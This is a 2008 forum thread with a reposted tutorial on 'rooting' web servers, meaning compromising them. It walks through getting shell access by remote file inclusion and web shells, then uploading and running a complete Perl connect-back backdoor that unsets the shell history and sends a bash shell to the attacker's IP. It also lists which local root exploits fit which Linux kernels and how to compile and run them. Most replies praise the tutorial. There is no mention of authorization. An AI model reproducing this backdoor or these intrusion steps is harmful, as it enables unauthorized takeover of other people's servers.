1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Rooting Tutorial

Discussion in 'Ethical hacking Tips' started by XXxxImmortalxxXX, Jun 15, 2008.

  1. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    NOTE THIS TUT WAS NOT CREATED BY ME IT WAS MADE BY w3tw0rk AT ROOT SHELL SECURITY TEAM. PLEASE GIVE ALL THE THANKS TO HIM FOR MAKING THIS TUTORIAL

    Hello Everyone and welcome to my tutorial on rooting boxes!! Today you will learn one of many methods to rooting an "insecure" box. Obviously if you are reading this I don't think you will be using any 0-day kernel exploits :P. So basic things you will need for this tutorial to work for you will be the following:

    Shell Access on a website is the first thing you will need. How you gain this access is entirely up to you. I would say most people will end up going with a simple remote file inclusion and place yourself a c99, r57, locust or any shell of your choice.

    You will want to get yourself a version of NetCat Which you can find at this location

    http://www.vulnwatch.org/netcat/nc111nt.zip

    If you have an antivirus that auto deletes infected files or virii i would suggest disabling it as some av's will detect netcat as a hacktool or remote admin tool. Once you have downloaded netcat open netcat up and it will ask you to enter a string for the command line. Reading up on netcat is recommended but if your lazy a string like this will do just fine

    Code:
    -vv -l -n -p <porttoconnecton>
    From there you will want to aquire a nice back-connect. I preffer to use one thats not in the shell because i find that those back connects work shitty so i will provide you with one that i use. Very simple to use just save as "bc.pl" then upload to server and end execute.

    Code:
    perl bc.pl <youriphere> <porttoconnecton>
    Code:
    #!/usr/bin/perl
    use IO::Socket;
    #   Priv8 ** Priv8 ** Priv8
    # IRAN HACKERS SABOTAGE Connect Back Shell          
    # code by:LorD
    # We Are :LorD-C0d3r-NT-\x90                                          
    # Email:LorD@ihsteam.com
    #
    #lord@SlackwareLinux:/home/programing$ perl dc.pl
    #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
    #
    #Usage: dc.pl [Host] [Port]
    #
    #Ex: dc.pl 127.0.0.1 2121
    #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
    #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
    #
    #[*] Resolving HostName
    #[*] Connecting... 127.0.0.1
    #[*] Spawning Shell
    #[*] Connected to remote host
    
    #bash-2.05b# nc -vv -l -p 2121
    #listening on [any] 2121 ...
    #connect to [127.0.0.1] from localhost [127.0.0.1] 32769
    #--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
    #
    #--==Systeminfo==--
    #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
    #
    #--==Userinfo==--
    #uid=1001(lord) gid=100(users) groups=100(users)
    #
    #--==Directory==--
    #/root
    #
    #--==Shell==--
    #
    $system    = '/bin/bash';
    $ARGC=@ARGV;
    print "IHS BACK-CONNECT BACKDOOR\n\n";
    if ($ARGC!=2) {
       print "Usage: $0 [Host] [Port] \n\n";
       die "Ex: $0 127.0.0.1 2121 \n";
    }
    use Socket;
    use FileHandle;
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
    print "[*] Resolving HostName\n";
    print "[*] Connecting... $ARGV[0] \n";
    print "[*] Spawning Shell \n";
    print "[*] Connected to remote host \n";
    SOCKET->autoflush();
    open(STDIN, ">&SOCKET");
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");
    print "IHS BACK-CONNECT BACKDOOR  \n\n";
    system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
    echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
    system($system);
    #EOF
    
    **Note that if you are running a router or wireless on multiple ips set by your dhcp you might have to forward the <porttoconnecton> to what ever the ip of your computer is. You can check this by opening command prompt and typing ipconfig you should get an ip that looks similar to 192.168.1.100 which is the ip to forward to. If you are unsure about how to forward your port check out this site and find your router model.

    http://portforward.com/routers.htm

    So Now that you have your tools and you have your shell access open up netcat and type in -vv -l -n -p 8080 for this tutorial we will connect on port 8080. Hit enter and it should start listening.

    Go back to the server and upload your bc.pl. Execute the back connect with a command such as perl bc.pl <yourip> 8080. once you execute this you can go back to the shell and it should have connected. With this particular back connect you don't have to find the kernel version because it displays it for you once it connects, but for those of you who are using a different back connect to find the os kernel version and userid you can type something like this into the shell and it will give you the info.
    Code:
    uname -a;id
    Once executed you will see something probably similar to

    Code:
    Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    The important information here that you want is the OS & Kernel Ver. which in this case would be Linux and the kernel ver. is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly old. which is a good thing for us.

    Here is a kernel refrence for you all this will tell you what exploits work for the differenet kernels. Just to give you a general idea. note that this refrence is kind of old but is still pretty accurate but there could be newer exploits now.

    Code:
    2.2 ->  ptrace
    2.4.17 -> newlocal, kmod, uselib24
    2.4.18 -> brk, brk2, newlocal, kmod
    2.4.19 -> brk, brk2, newlocal, kmod
    2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
    2.4.21 -> brk, brk2, ptrace, ptrace-kmod
    2.4.22 -> brk, brk2, ptrace, ptrace-kmod
    2.4.22-10 -> loginx
    2.4.23 -> mremap_pte
    2.4.24 -> mremap_pte, uselib24
    2.4.25-1 -> uselib24
    2.4.27 -> uselib24
    2.6.2 -> mremap_pte, krad, h00lyshit
    2.6.5 -> krad, krad2, h00lyshit
    2.6.6 -> krad, krad2, h00lyshit
    2.6.7 -> krad, krad2, h00lyshit
    2.6.8 -> krad, krad2, h00lyshit
    2.6.8-5 -> krad2, h00lyshit
    2.6.9 -> krad, krad2, h00lyshit
    2.6.9-34 -> r00t, h00lyshit
    2.6.10 -> krad, krad2, h00lyshit
    2.6.13 -> raptor, raptor2, h0llyshit, prctl
    2.6.14 -> raptor, raptor2, h0llyshit, prctl
    2.6.15 -> raptor, raptor2, h0llyshit, prctl
    2.6.16 -> raptor, raptor2, h0llyshit, prctl
    2.6.23 - 2.6.24 -> diane_lane_******_hard.c
    2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
    
    Once you have found the Kernel ver. of the server you are about to root you need to find the Local Root Exploit for that kernel which you can find with google using the list above. Once you have found your Exploit you will want to compile it assuming it's in c which most are. To compile your xpl.c what you want to do is place the xpl.c on the server where you placed you bc.pl and then compile it. To Compile your c scripts go to your shell that you have spawned with netcat and type:
    ex:

    Code:
    gcc xpl.c -o xpl
    This will compile your xpl.c to a file named xpl.

    From here now all you have to do is run your exploit which can be done by simply typing in your netcat connection

    Code:
    ./xpl
    It should execute the exploit file which you have just compiled and give you root depending on what the exploit requires. Some require nothing but running them. Others such as h0llyshit require a large file to exploit or to be made to exploit but this is just to explain how to root. you can read up on h0llyshit from here if you would like.

    I know that there are many other methods to rooting boxes but this is one method that is people can use that is fairly easy to follow. If you have any comments about the method feel free to ask but please don't knock it down. If you do not like this method thats fine you can write a tutorial for everyone using your own method.

    Hope you enjoyed this tutorial and i hope it was helpful to you.

    Tutorial by w3tw0rk shoutz to rootshell security team
    http://www.rootshell-team.com
     
  2. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,283
    Likes Received:
    364
    Trophy Points:
    83
    Nicely written and bookmarked in facebook. Also I guess you have the permission to post the tut here.
     
  3. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
  4. Bakalinvadbad

    Bakalinvadbad New Member

    Joined:
    Jun 16, 2008
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Hi maaan ))))

    Great site! I'm impressed. :)
     
  5. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
  6. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,283
    Likes Received:
    364
    Trophy Points:
    83
  7. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    thankyou so much sir
     
  8. Kaleb32

    Kaleb32 New Member

    Joined:
    Jul 3, 2008
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    N/a
    Location:
    Tennessee
    This is my first post and this really helped me out with rooting problems :pleased:
     
  9. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    ohh Well thanks mate lol ummm post ur adventures on what all you have done with this tutorial. also go to rootthisbox.org for your more rooting needs
     
  10. GreenGrass

    GreenGrass New Member

    Joined:
    Jul 5, 2008
    Messages:
    123
    Likes Received:
    8
    Trophy Points:
    0
    Location:
    Norway
  11. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
  12. Kaleb32

    Kaleb32 New Member

    Joined:
    Jul 3, 2008
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    N/a
    Location:
    Tennessee
    Sameless Promotion lol
     
  13. Kaleb32

    Kaleb32 New Member

    Joined:
    Jul 3, 2008
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    N/a
    Location:
    Tennessee
    oooops Shameless* :D
     
  14. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
  15. rider

    rider New Member

    Joined:
    Jul 10, 2008
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    0
    Home Page:
    that is not a rooting tutorial ... i`m sorry to tell you that what have you write is just a connect back application . First to get root access in a unix server you need to enter in that root. Fallow this link to see what that tutorial is about. Live :)
    http://2search.ro/hacked/images/printscrn.JPG
     
  16. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    Well actually im sry to tell you but yes this is considered a rooting tutorial there are numerous amounts of ways to root which one u decided is ur choice
     
  17. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,283
    Likes Received:
    364
    Trophy Points:
    83
  18. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,283
    Likes Received:
    364
    Trophy Points:
    83
    This Article won the Article of the month. Congrats !!!!
     
  19. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
  20. linuxswan

    linuxswan New Member

    Joined:
    Aug 7, 2008
    Messages:
    43
    Likes Received:
    5
    Trophy Points:
    0
    such a huge code and really saying i dont understand whole thing, a little bit with the inofrmation only
     

Share This Page